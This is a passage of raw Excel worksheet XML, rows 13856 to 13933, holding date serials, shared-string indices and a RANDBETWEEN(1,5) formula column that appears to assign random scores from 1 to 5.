        <v>4</v>
      </c>
    </row>
    <row r="13856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13856" s="1">
        <v>43258.498530092591</v>
      </c>
      <c r="C13856" t="s">
        <v>10</v>
      </c>
      <c r="D13856" t="s">
        <v>20</v>
      </c>
      <c r="E13856" t="s">
        <v>12424</v>
      </c>
      <c r="F13856">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13857" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13857" s="1">
        <v>43258.497916666667</v>
      </c>
      <c r="C13857" t="s">
        <v>10</v>
      </c>
      <c r="D13857" t="s">
        <v>80</v>
      </c>
      <c r="E13857" s="2" t="s">
        <v>12425</v>
      </c>
      <c r="F13857">
        <f t="shared" ca="1" si="216"/>
        <v>3</v>
      </c>
    </row>
    <row r="13858" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13858" s="1">
        <v>43258.473043981481</v>
      </c>
      <c r="C13858" t="s">
        <v>10</v>
      </c>
      <c r="D13858" t="s">
        <v>46</v>
      </c>
      <c r="E13858" s="2" t="s">
        <v>12426</v>
      </c>
      <c r="F13858">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13859" s="1">
        <v>43258.43478009259</v>
      </c>
      <c r="C13859" t="s">
        <v>10</v>
      </c>
      <c r="D13859" t="s">
        <v>17</v>
      </c>
      <c r="E13859" t="s">
        <v>12427</v>
      </c>
      <c r="F13859">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13860" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13860" s="1">
        <v>43258.430289351854</v>
      </c>
      <c r="C13860" t="s">
        <v>6</v>
      </c>
      <c r="D13860" t="s">
        <v>25</v>
      </c>
      <c r="E13860" s="2" t="s">
        <v>12428</v>
      </c>
      <c r="F13860">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13861" s="1">
        <v>43258.42832175926</v>
      </c>
      <c r="C13861" t="s">
        <v>10</v>
      </c>
      <c r="D13861" t="s">
        <v>244</v>
      </c>
      <c r="E13861" t="s">
        <v>12429</v>
      </c>
      <c r="F13861">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13862" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13862" s="1">
        <v>43258.363587962966</v>
      </c>
      <c r="C13862" t="s">
        <v>65</v>
      </c>
      <c r="E13862" s="2" t="s">
        <v>12430</v>
      </c>
      <c r="F13862">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13863" s="1">
        <v>43258.348599537036</v>
      </c>
      <c r="C13863" t="s">
        <v>10</v>
      </c>
      <c r="D13863" t="s">
        <v>17</v>
      </c>
      <c r="E13863" t="s">
        <v>12431</v>
      </c>
      <c r="F13863">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13864" s="1">
        <v>43258.344259259262</v>
      </c>
      <c r="C13864" t="s">
        <v>41</v>
      </c>
      <c r="E13864" t="s">
        <v>12432</v>
      </c>
      <c r="F13864">
        <f t="shared" ca="1" si="216"/>
        <v>3</v>
      </c>
    </row>
    <row r="13865" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13865" s="1">
        <v>43258.304282407407</v>
      </c>
      <c r="C13865" t="s">
        <v>41</v>
      </c>
      <c r="E13865" s="2" t="s">
        <v>12433</v>
      </c>
      <c r="F13865">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13866" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13866" s="1">
        <v>43258.297199074077</v>
      </c>
      <c r="C13866" t="s">
        <v>124</v>
      </c>
      <c r="E13866" s="2" t="s">
        <v>12434</v>
      </c>
      <c r="F13866">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13867" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13867" s="1">
        <v>43258.264930555553</v>
      </c>
      <c r="C13867" t="s">
        <v>463</v>
      </c>
      <c r="E13867" s="2" t="s">
        <v>12435</v>
      </c>
      <c r="F13867">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13868" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13868" s="1">
        <v>43258.261307870373</v>
      </c>
      <c r="C13868" t="s">
        <v>463</v>
      </c>
      <c r="E13868" s="2" t="s">
        <v>12435</v>
      </c>
      <c r="F13868">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13869" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A13869" s="1">
        <v>43258.252129629633</v>
      </c>
      <c r="C13869" t="s">
        <v>10</v>
      </c>
      <c r="D13869" t="s">
        <v>89</v>
      </c>
      <c r="E13869" s="2" t="s">
        <v>12436</v>
      </c>
      <c r="F13869">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13870" s="1">
        <v>43258.186840277776</v>
      </c>
      <c r="C13870" t="s">
        <v>173</v>
      </c>
      <c r="E13870" t="s">
        <v>12437</v>
      </c>
      <c r="F13870">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13871" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13871" s="1">
        <v>43258.177361111113</v>
      </c>
      <c r="C13871" t="s">
        <v>139</v>
      </c>
      <c r="D13871" t="s">
        <v>312</v>
      </c>
      <c r="E13871" s="2" t="s">
        <v>12438</v>
      </c>
      <c r="F13871">
        <f t="shared" ca="1" si="216"/>
        <v>3</v>
      </c>
    </row>
    <row r="13872" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13872" s="1">
        <v>43258.165069444447</v>
      </c>
      <c r="C13872" t="s">
        <v>65</v>
      </c>
      <c r="E13872" s="2" t="s">
        <v>12439</v>
      </c>
      <c r="F13872">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13873" s="1">
        <v>43258.149305555555</v>
      </c>
      <c r="C13873" t="s">
        <v>318</v>
      </c>
      <c r="E13873" t="s">
        <v>12440</v>
      </c>
      <c r="F13873">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13874" s="1">
        <v>43258.141585648147</v>
      </c>
      <c r="C13874" t="s">
        <v>41</v>
      </c>
      <c r="F13874">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13875" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13875" s="1">
        <v>43258.075370370374</v>
      </c>
      <c r="C13875" t="s">
        <v>140</v>
      </c>
      <c r="D13875" t="s">
        <v>141</v>
      </c>
      <c r="E13875" s="2" t="s">
        <v>12441</v>
      </c>
      <c r="F13875">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13876" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13876" s="1">
        <v>43258.070960648147</v>
      </c>
      <c r="C13876" t="s">
        <v>10</v>
      </c>
      <c r="D13876" t="s">
        <v>20</v>
      </c>
      <c r="E13876" s="2" t="s">
        <v>12442</v>
      </c>
      <c r="F13876">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13877" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13877" s="1">
        <v>43258.070092592592</v>
      </c>
      <c r="C13877" t="s">
        <v>41</v>
      </c>
      <c r="E13877" s="2" t="s">
        <v>12443</v>
      </c>
      <c r="F13877">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13878" s="1">
        <v>43258.041701388887</v>
      </c>
      <c r="C13878" t="s">
        <v>41</v>
      </c>
      <c r="E13878" t="s">
        <v>12444</v>
      </c>
      <c r="F13878">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13879" s="1">
        <v>43258.033761574072</v>
      </c>
      <c r="C13879" t="s">
        <v>140</v>
      </c>
      <c r="D13879" t="s">
        <v>234</v>
      </c>
      <c r="E13879" t="s">
        <v>12445</v>
      </c>
      <c r="F13879">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13880" s="1">
        <v>43257.904421296298</v>
      </c>
      <c r="C13880" t="s">
        <v>73</v>
      </c>
      <c r="E13880" t="s">
        <v>12446</v>
      </c>
      <c r="F13880">
        <f t="shared" ca="1" si="216"/>
        <v>3</v>
      </c>
    </row>
    <row r="13881" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A13881" s="1">
        <v>43257.898206018515</v>
      </c>
      <c r="C13881" t="s">
        <v>140</v>
      </c>
      <c r="D13881" t="s">
        <v>234</v>
      </c>
      <c r="E13881" s="2" t="s">
        <v>12447</v>
      </c>
      <c r="F13881">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13882" s="1">
        <v>43257.861203703702</v>
      </c>
      <c r="C13882" t="s">
        <v>140</v>
      </c>
      <c r="D13882" t="s">
        <v>141</v>
      </c>
      <c r="E13882" t="s">
        <v>12448</v>
      </c>
      <c r="F13882">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13883" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13883" s="1">
        <v>43257.857430555552</v>
      </c>
      <c r="C13883" t="s">
        <v>6</v>
      </c>
      <c r="E13883" s="2" t="s">
        <v>12449</v>
      </c>
      <c r="F13883">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13884" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13884" s="1">
        <v>43257.80060185185</v>
      </c>
      <c r="C13884" t="s">
        <v>140</v>
      </c>
      <c r="D13884" t="s">
        <v>234</v>
      </c>
      <c r="E13884" s="2" t="s">
        <v>12450</v>
      </c>
      <c r="F13884">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13885" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13885" s="1">
        <v>43257.79184027778</v>
      </c>
      <c r="C13885" t="s">
        <v>10</v>
      </c>
      <c r="D13885" t="s">
        <v>6</v>
      </c>
      <c r="E13885" s="2" t="s">
        <v>12451</v>
      </c>
      <c r="F13885">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13886" s="1">
        <v>43257.734305555554</v>
      </c>
      <c r="C13886" t="s">
        <v>10</v>
      </c>
      <c r="D13886" t="s">
        <v>14</v>
      </c>
      <c r="E13886" t="s">
        <v>12452</v>
      </c>
      <c r="F13886">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13887" s="1">
        <v>43257.726585648146</v>
      </c>
      <c r="C13887" t="s">
        <v>10</v>
      </c>
      <c r="D13887" t="s">
        <v>158</v>
      </c>
      <c r="E13887" t="s">
        <v>12453</v>
      </c>
      <c r="F13887">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13888" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13888" s="1">
        <v>43257.726342592592</v>
      </c>
      <c r="C13888" t="s">
        <v>10</v>
      </c>
      <c r="D13888" t="s">
        <v>158</v>
      </c>
      <c r="E13888" s="2" t="s">
        <v>12454</v>
      </c>
      <c r="F13888">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13889" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13889" s="1">
        <v>43257.688483796293</v>
      </c>
      <c r="C13889" t="s">
        <v>10</v>
      </c>
      <c r="D13889" t="s">
        <v>6</v>
      </c>
      <c r="E13889" s="2" t="s">
        <v>12455</v>
      </c>
      <c r="F13889">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13890" s="1">
        <v>43257.664641203701</v>
      </c>
      <c r="C13890" t="s">
        <v>10</v>
      </c>
      <c r="D13890" t="s">
        <v>112</v>
      </c>
      <c r="E13890" t="s">
        <v>12456</v>
      </c>
      <c r="F13890">
        <f t="shared" ref="F13890:F13953" ca="1" si="217">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="13891" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13891" s="1">
        <v>43257.659386574072</v>
      </c>
      <c r="C13891" t="s">
        <v>260</v>
      </c>
      <c r="E13891" s="2" t="s">
        <v>12457</v>
      </c>
      <c r="F13891">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13892" s="1">
        <v>43257.613969907405</v>
      </c>
      <c r="C13892" t="s">
        <v>10</v>
      </c>
      <c r="D13892" t="s">
        <v>158</v>
      </c>
      <c r="E13892" t="s">
        <v>12458</v>
      </c>
      <c r="F13892">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13893" s="1">
        <v>43257.611342592594</v>
      </c>
      <c r="C13893" t="s">
        <v>10</v>
      </c>
      <c r="D13893" t="s">
        <v>17</v>
      </c>
      <c r="E13893" t="s">
        <v>12459</v>
      </c>
      <c r="F13893">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13894" s="1">
        <v>43257.6096412037</v>
      </c>
      <c r="C13894" t="s">
        <v>10</v>
      </c>
      <c r="D13894" t="s">
        <v>33</v>
      </c>
      <c r="E13894" t="s">
        <v>12460</v>
      </c>
      <c r="F13894">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13895" s="1">
        <v>43257.603449074071</v>
      </c>
      <c r="C13895" t="s">
        <v>10</v>
      </c>
      <c r="D13895" t="s">
        <v>41</v>
      </c>
      <c r="E13895" t="s">
        <v>12461</v>
      </c>
      <c r="F13895">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13896" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13896" s="1">
        <v>43257.585486111115</v>
      </c>
      <c r="C13896" t="s">
        <v>10</v>
      </c>
      <c r="D13896" t="s">
        <v>89</v>
      </c>
      <c r="E13896" s="2" t="s">
        <v>12462</v>
      </c>
      <c r="F13896">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13897" s="1">
        <v>43257.57675925926</v>
      </c>
      <c r="C13897" t="s">
        <v>10</v>
      </c>
      <c r="D13897" t="s">
        <v>494</v>
      </c>
      <c r="E13897" t="s">
        <v>12463</v>
      </c>
      <c r="F13897">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13898" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13898" s="1">
        <v>43257.527442129627</v>
      </c>
      <c r="C13898" t="s">
        <v>10</v>
      </c>
      <c r="D13898" t="s">
        <v>33</v>
      </c>
      <c r="E13898" s="2" t="s">
        <v>12464</v>
      </c>
      <c r="F13898">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13899" s="1">
        <v>43257.517488425925</v>
      </c>
      <c r="C13899" t="s">
        <v>10</v>
      </c>
      <c r="D13899" t="s">
        <v>17</v>
      </c>
      <c r="E13899" t="s">
        <v>12465</v>
      </c>
      <c r="F13899">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13900" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13900" s="1">
        <v>43257.511932870373</v>
      </c>
      <c r="C13900" t="s">
        <v>10</v>
      </c>
      <c r="D13900" t="s">
        <v>6</v>
      </c>
      <c r="E13900" s="2" t="s">
        <v>12466</v>
      </c>
      <c r="F13900">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13901" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13901" s="1">
        <v>43257.497442129628</v>
      </c>
      <c r="C13901" t="s">
        <v>10</v>
      </c>
      <c r="D13901" t="s">
        <v>33</v>
      </c>
      <c r="E13901" s="2" t="s">
        <v>12467</v>
      </c>
      <c r="F13901">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13902" s="1">
        <v>43257.491331018522</v>
      </c>
      <c r="C13902" t="s">
        <v>10</v>
      </c>
      <c r="D13902" t="s">
        <v>89</v>
      </c>
      <c r="E13902" t="s">
        <v>12468</v>
      </c>
      <c r="F13902">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13903" s="1">
        <v>43257.482372685183</v>
      </c>
      <c r="C13903" t="s">
        <v>10</v>
      </c>
      <c r="D13903" t="s">
        <v>46</v>
      </c>
      <c r="E13903" t="s">
        <v>12469</v>
      </c>
      <c r="F13903">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13904" s="1">
        <v>43257.431909722225</v>
      </c>
      <c r="C13904" t="s">
        <v>10</v>
      </c>
      <c r="D13904" t="s">
        <v>336</v>
      </c>
      <c r="E13904" t="s">
        <v>12470</v>
      </c>
      <c r="F13904">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13905" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13905" s="1">
        <v>43257.413831018515</v>
      </c>
      <c r="C13905" t="s">
        <v>10</v>
      </c>
      <c r="D13905" t="s">
        <v>494</v>
      </c>
      <c r="E13905" t="s">
        <v>12471</v>
      </c>
      <c r="F13905">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13906" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13906" s="1">
        <v>43257.409502314818</v>
      </c>
      <c r="C13906" t="s">
        <v>82</v>
      </c>
      <c r="E13906" s="2" t="s">
        <v>12472</v>
      </c>
      <c r="F13906">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13907" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13907" s="1">
        <v>43257.404618055552</v>
      </c>
      <c r="C13907" t="s">
        <v>71</v>
      </c>
      <c r="E13907" s="2" t="s">
        <v>12473</v>
      </c>
      <c r="F13907">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13908" s="1">
        <v>43257.400983796295</v>
      </c>
      <c r="C13908" t="s">
        <v>10</v>
      </c>
      <c r="D13908" t="s">
        <v>494</v>
      </c>
      <c r="E13908" t="s">
        <v>12474</v>
      </c>
      <c r="F13908">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13909" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A13909" s="1">
        <v>43257.38553240741</v>
      </c>
      <c r="C13909" t="s">
        <v>71</v>
      </c>
      <c r="E13909" s="2" t="s">
        <v>12475</v>
      </c>
      <c r="F13909">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13910" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13910" s="1">
        <v>43257.366319444445</v>
      </c>
      <c r="C13910" t="s">
        <v>333</v>
      </c>
      <c r="E13910" s="2" t="s">
        <v>12476</v>
      </c>
      <c r="F13910">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13911" s="1">
        <v>43257.346631944441</v>
      </c>
      <c r="C13911" t="s">
        <v>10</v>
      </c>
      <c r="D13911" t="s">
        <v>112</v>
      </c>
      <c r="E13911" t="s">
        <v>12477</v>
      </c>
      <c r="F13911">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13912" s="1">
        <v>43257.339236111111</v>
      </c>
      <c r="C13912" t="s">
        <v>461</v>
      </c>
      <c r="E13912" t="s">
        <v>12478</v>
      </c>
      <c r="F13912">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13913" s="1">
        <v>43257.310555555552</v>
      </c>
      <c r="C13913" t="s">
        <v>189</v>
      </c>
      <c r="E13913" t="s">
        <v>12479</v>
      </c>
      <c r="F13913">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13914" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13914" s="1">
        <v>43257.271365740744</v>
      </c>
      <c r="C13914" t="s">
        <v>48</v>
      </c>
      <c r="D13914" t="s">
        <v>312</v>
      </c>
      <c r="E13914" s="2" t="s">
        <v>12480</v>
      </c>
      <c r="F13914">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13915" s="1">
        <v>43257.223680555559</v>
      </c>
      <c r="C13915" t="s">
        <v>71</v>
      </c>
      <c r="E13915" t="s">
        <v>12481</v>
      </c>
      <c r="F13915">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13916" s="1">
        <v>43257.212233796294</v>
      </c>
      <c r="C13916" t="s">
        <v>166</v>
      </c>
      <c r="E13916" t="s">
        <v>12482</v>
      </c>
      <c r="F13916">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13917" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13917" s="1">
        <v>43257.178657407407</v>
      </c>
      <c r="C13917" t="s">
        <v>454</v>
      </c>
      <c r="E13917" s="2" t="s">
        <v>12483</v>
      </c>
      <c r="F13917">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13918" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13918" s="1">
        <v>43257.167858796296</v>
      </c>
      <c r="C13918" t="s">
        <v>124</v>
      </c>
      <c r="E13918" s="2" t="s">
        <v>12484</v>
      </c>
      <c r="F13918">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13919" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13919" s="1">
        <v>43257.156631944446</v>
      </c>
      <c r="C13919" t="s">
        <v>69</v>
      </c>
      <c r="E13919" s="2" t="s">
        <v>12485</v>
      </c>
      <c r="F13919">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13920" s="1">
        <v>43257.151898148149</v>
      </c>
      <c r="C13920" t="s">
        <v>60</v>
      </c>
      <c r="E13920" t="s">
        <v>12486</v>
      </c>
      <c r="F13920">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13921" s="1">
        <v>43257.131157407406</v>
      </c>
      <c r="C13921" t="s">
        <v>41</v>
      </c>
      <c r="E13921" t="s">
        <v>12487</v>
      </c>
      <c r="F13921">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13922" s="1">
        <v>43257.103900462964</v>
      </c>
      <c r="C13922" t="s">
        <v>41</v>
      </c>
      <c r="E13922" t="s">
        <v>12488</v>
      </c>
      <c r="F13922">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13923" s="1">
        <v>43257.050717592596</v>
      </c>
      <c r="C13923" t="s">
        <v>41</v>
      </c>
      <c r="F13923">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13924" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13924" s="1">
        <v>43257.008518518516</v>
      </c>
      <c r="C13924" t="s">
        <v>73</v>
      </c>
      <c r="E13924" t="s">
        <v>12489</v>
      </c>
      <c r="F13924">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13925" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13925" s="1">
        <v>43256.998726851853</v>
      </c>
      <c r="C13925" t="s">
        <v>9609</v>
      </c>
      <c r="D13925" t="s">
        <v>67</v>
      </c>
      <c r="E13925" s="2" t="s">
        <v>12490</v>
      </c>
      <c r="F13925">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13926" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13926" s="1">
        <v>43256.992766203701</v>
      </c>
      <c r="C13926" t="s">
        <v>260</v>
      </c>
      <c r="E13926" s="2" t="s">
        <v>12491</v>
      </c>
      <c r="F13926">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13927" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13927" s="1">
        <v>43256.841377314813</v>
      </c>
      <c r="C13927" t="s">
        <v>720</v>
      </c>
      <c r="D13927" t="s">
        <v>229</v>
      </c>
      <c r="E13927" s="2" t="s">
        <v>12492</v>
      </c>
      <c r="F13927">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13928" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13928" s="1">
        <v>43256.755520833336</v>
      </c>
      <c r="C13928" t="s">
        <v>107</v>
      </c>
      <c r="D13928" t="s">
        <v>80</v>
      </c>
      <c r="E13928" s="2" t="s">
        <v>12493</v>
      </c>
      <c r="F13928">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13929" s="1">
        <v>43256.745092592595</v>
      </c>
      <c r="C13929" t="s">
        <v>10</v>
      </c>
      <c r="D13929" t="s">
        <v>46</v>
      </c>
      <c r="E13929" t="s">
        <v>12494</v>
      </c>
      <c r="F13929">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13930" s="1">
        <v>43256.728217592594</v>
      </c>
      <c r="C13930" t="s">
        <v>10</v>
      </c>
      <c r="D13930" t="s">
        <v>86</v>
      </c>
      <c r="E13930" t="s">
        <v>12495</v>
      </c>
      <c r="F13930">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13931" s="1">
        <v>43256.712453703702</v>
      </c>
      <c r="C13931" t="s">
        <v>10</v>
      </c>
      <c r="D13931" t="s">
        <v>178</v>
      </c>
      <c r="E13931" t="s">
        <v>12496</v>
      </c>
      <c r="F13931">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13932" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13932" s="1">
        <v>43256.705787037034</v>
      </c>
      <c r="C13932" t="s">
        <v>10</v>
      </c>
      <c r="D13932" t="s">
        <v>17</v>
      </c>
      <c r="E13932" s="2" t="s">
        <v>12497</v>
      </c>
      <c r="F13932">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13933" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13933" s="1">
        <v>43256.701273148145</v>
      </c>
      <c r="C13933" t="s">
        <v>6</v>
      </c>
      <c r="D13933" t="s">
        <v>114</v>
      </c>
      <c r="E13933" s="2" t="s">
        <v>12498</v>
      </c>
      <c r="F13933">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
